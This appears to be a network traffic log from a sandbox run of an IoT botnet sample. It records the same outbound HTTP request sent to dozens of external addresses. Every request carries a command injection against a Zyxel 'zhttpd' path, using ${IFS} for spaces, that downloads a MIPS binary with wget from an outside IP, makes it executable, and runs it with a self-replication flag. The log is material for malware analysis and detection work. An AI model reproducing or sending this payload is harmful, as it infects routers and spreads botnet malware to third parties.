                                          Jan 14, 2024 15:46:36.469515085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9430192.168.2.235542697.93.208.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.482677937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9431192.168.2.23434864.75.156.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.482709885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9432192.168.2.2357108126.195.147.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.482738972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9433192.168.2.234513627.174.178.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.482806921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9434192.168.2.2359236124.208.50.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.482846975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9435192.168.2.235314258.59.49.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.482893944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9436192.168.2.2337028195.43.223.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.482950926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9437192.168.2.235998434.108.99.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483002901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9438192.168.2.233375858.86.23.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483052969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9439192.168.2.2339222148.107.250.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483093023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9440192.168.2.2348930142.242.129.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483174086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9441192.168.2.2357162102.69.137.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483218908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9442192.168.2.235443012.185.154.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483263016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9443192.168.2.235140235.208.149.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483300924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9444192.168.2.235571498.19.133.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483342886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9445192.168.2.2349658149.73.94.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483397007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9446192.168.2.236023667.81.254.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483452082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9447192.168.2.235995665.180.59.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483479977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9448192.168.2.233593837.89.27.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483539104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9449192.168.2.233897050.136.108.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483598948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9450192.168.2.235931673.55.55.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483649969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9451192.168.2.2334070197.175.240.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483670950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9452192.168.2.233890291.232.207.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483699083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9453192.168.2.235478862.213.198.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483760118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9454192.168.2.23445549.121.113.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483788967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9455192.168.2.2340988168.88.243.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483823061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9456192.168.2.2341216201.240.234.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483879089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9457192.168.2.234016413.114.188.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483911991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9458192.168.2.234882683.45.36.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483973980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9459192.168.2.2358766195.153.31.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.483997107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9460192.168.2.2348378166.192.252.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484035969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9461192.168.2.2354428109.19.63.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484090090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9462192.168.2.236082040.90.195.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484157085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9463192.168.2.234082068.159.120.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484215975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9464192.168.2.235627823.246.69.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484256029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9465192.168.2.234332093.211.234.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484282017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9466192.168.2.2340248109.28.157.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484323978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9467192.168.2.234541493.41.12.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484386921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9468192.168.2.2333678174.91.62.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484420061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9469192.168.2.2358836146.213.190.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484497070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9470192.168.2.233917460.150.177.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484545946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9471192.168.2.234060031.106.98.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484565973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9472192.168.2.2345356212.129.93.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484603882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9473192.168.2.235595020.179.10.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484692097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9474192.168.2.2343538133.4.5.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484728098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9475192.168.2.234085478.20.72.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484772921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9476192.168.2.2356488148.127.124.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484821081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9477192.168.2.234049465.89.85.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484844923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9478192.168.2.234501692.53.225.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484874010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9479192.168.2.2340162122.197.60.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484903097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9480192.168.2.235114042.112.253.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484940052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9481192.168.2.2334002212.45.107.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.484988928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9482192.168.2.2355502124.15.117.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.485033035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9483192.168.2.2341654153.221.209.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.485104084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9484192.168.2.2335606109.111.172.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.485131979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9485192.168.2.2342074202.194.57.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.485197067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9486192.168.2.234943643.20.51.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.485241890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9487192.168.2.2358754207.85.215.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.485326052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9488192.168.2.233470293.178.186.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.485367060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9489192.168.2.2356382201.235.115.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.485392094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9490192.168.2.2334402199.116.161.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.485429049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9491192.168.2.233728624.47.56.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.485455036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9492192.168.2.2348286163.163.31.150443
                                          TimestampBytes transferredDirectionData
